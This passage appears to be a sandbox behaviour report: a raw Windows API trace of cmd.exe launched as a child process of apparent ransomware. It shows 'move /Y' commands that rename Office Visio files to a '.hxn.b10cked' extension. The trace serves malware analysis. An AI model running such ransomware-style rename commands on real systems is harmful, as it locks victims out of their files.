lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.274] SetErrorMode (uMode=0x0) returned 0x0 [0202.274] SetErrorMode (uMode=0x1) returned 0x0 [0202.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", nBufferLength=0x104, lpBuffer=0x18f01c, lpFilePart=0x18f004 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", lpFilePart=0x18f004*="MSE1C9~1.HXN") returned 0x27 [0202.274] SetErrorMode (uMode=0x0) returned 0x1 [0202.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2=".") returned 63 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2="..") returned 63 [0202.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mse1c9~1.hxn")) returned 0x2022 [0202.274] SetErrorMode (uMode=0x0) returned 0x0 [0202.274] SetErrorMode (uMode=0x1) returned 0x0 [0202.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", nBufferLength=0x104, lpBuffer=0x18f498, lpFilePart=0x18f230 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", lpFilePart=0x18f230*="MSE1C9~1.HXN") returned 0x27 [0202.274] SetErrorMode (uMode=0x0) returned 0x1 [0202.275] SetErrorMode (uMode=0x0) returned 0x0 [0202.275] SetErrorMode (uMode=0x1) returned 0x0 [0202.275] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f6a0, lpFilePart=0x18f230 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked", lpFilePart=0x18f230*="MS.VISIO_PRM.14.1033.hxn.b10cked") returned 0x3b [0202.275] SetErrorMode (uMode=0x0) returned 0x1 [0202.275] SetLastError (dwErrCode=0x0) [0202.275] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~2\\ms.visio_prm.14.1033.hxn.b10cked")) returned 0xffffffff [0202.275] GetLastError () returned 0x2 [0202.275] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebac) returned 0x1f0e88 [0202.275] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x18ebac | out: lpFindFileData=0x18ebac) returned 0 [0202.275] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.276] GetLastError () returned 0x12 [0202.276] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebac) returned 0x1f0e88 [0202.276] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x18ebac | out: lpFindFileData=0x18ebac) returned 0 [0202.276] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.276] GetLastError () returned 0x12 [0202.276] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x201bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x201bf0) returned 0x1f0e88 [0202.277] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x201bf0 | out: lpFindFileData=0x201bf0) returned 0 [0202.277] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.277] GetLastError () returned 0x12 [0202.277] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x201bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x201bf0) returned 0x1f0e88 [0202.277] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x201bf0 | out: lpFindFileData=0x201bf0) returned 0 [0202.277] FindClose (in: hFindFile=0x1f0e88 | out: 
hFindFile=0x1f0e88) returned 1 [0202.277] GetLastError () returned 0x12 [0202.277] _get_osfhandle (_FileHandle=2) returned 0xb [0202.277] GetFileType (hFile=0xb) returned 0x2 [0202.585] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.585] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ed7c | out: lpMode=0x18ed7c) returned 1 [0202.585] _get_osfhandle (_FileHandle=2) returned 0xb [0202.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18edb0 | out: lpConsoleScreenBufferInfo=0x18edb0) returned 1 [0202.585] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.586] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18edf0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.586] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18edd4*=0x2c) returned 1 [0202.586] longjmp () [0202.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.586] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.587] SetConsoleInputExeNameW () returned 0x1 [0202.587] GetConsoleOutputCP () returned 0x1b5 [0202.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.587] exit (_Code=1) Process: id = 
"481" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29420 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29421 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29422 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29423 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 29424 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29425 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29426 start_va = 0x77470000 end_va = 0x77470fff entry_point = 
0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29427 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29428 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29429 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30316 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30317 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30318 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30319 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 30320 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 30321 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30322 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30323 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30324 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30325 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30326 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30327 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30328 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30329 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30330 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 30331 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30332 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30333 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30334 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30335 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30336 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30337 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 30338 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 30339 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 30340 start_va = 0x13a0000 end_va = 0x145ffff entry_point = 0x13a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 678 os_tid = 0xdb8 [0205.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f8ec | out: lpSystemTimeAsFileTime=0x22f8ec*(dwLowDateTime=0xaf393680, dwHighDateTime=0x1d440a9)) [0205.380] GetCurrentProcessId () returned 0x92c [0205.380] GetCurrentThreadId () returned 0xdb8 [0205.380] GetTickCount () returned 0x39d95 [0205.380] QueryPerformanceCounter (in: lpPerformanceCount=0x22f8e4 | out: lpPerformanceCount=0x22f8e4*=26216961935) returned 1 [0205.381] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.381] __set_app_type (_Type=0x1) [0205.381] __p__fmode () returned 0x76b331f4 
[0205.381] __p__commode () returned 0x76b331fc [0205.381] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.381] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.381] GetCurrentThreadId () returned 0xdb8 [0205.381] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdb8) returned 0x38 [0205.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.382] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.382] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.382] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f87c | out: phkResult=0x22f87c*=0x0) returned 0x2 [0205.382] VirtualQuery (in: lpAddress=0x22f8b3, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0205.382] GetConsoleOutputCP () returned 0x1b5 [0205.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.382] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.382] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.383] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.383] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.383] GetEnvironmentStringsW () returned 0x360190* [0205.383] FreeEnvironmentStringsW (penv=0x360190) returned 1 [0205.383] GetEnvironmentStringsW () returned 0x360190* [0205.384] FreeEnvironmentStringsW (penv=0x360190) returned 1 [0205.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e7ec | out: phkResult=0x22e7ec*=0x40) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0xb8, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x0, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegCloseKey (hKey=0x40) returned 0x0 [0205.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e7ec | out: phkResult=0x22e7ec*=0x40) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e7f4, 
lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x0, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x9, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x9, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x9, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegCloseKey (hKey=0x40) returned 0x0 [0205.384] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.384] srand (_Seed=0x5b8863a7) [0205.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"" [0205.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"" [0205.385] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3618f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.385] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.385] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.385] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.385] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.385] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.385] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.385] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.385] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.385] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.385] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.385] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.385] GetEnvironmentStringsW () returned 0x3622e0* [0205.385] FreeEnvironmentStringsW (penv=0x3622e0) returned 1 [0205.385] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.385] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.385] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.386] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.386] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.386] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.386] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.386] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.386] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.386] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f5b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f5b8, lpFilePart=0x22f5b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f5b4*="Desktop") returned 0x18 [0205.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.386] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f334 | out: lpFindFileData=0x22f334) returned 0x360020 [0205.386] FindClose (in: hFindFile=0x360020 | out: hFindFile=0x360020) returned 1 [0205.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f334 | out: lpFindFileData=0x22f334) returned 0x360020 [0205.386] FindClose (in: hFindFile=0x360020 | out: hFindFile=0x360020) returned 1 [0205.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f334 | out: lpFindFileData=0x22f334) returned 0x360020 [0205.386] FindClose (in: hFindFile=0x360020 | out: hFindFile=0x360020) returned 1 [0205.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.387] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.387] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.387] GetEnvironmentStringsW () returned 0x362b00* 
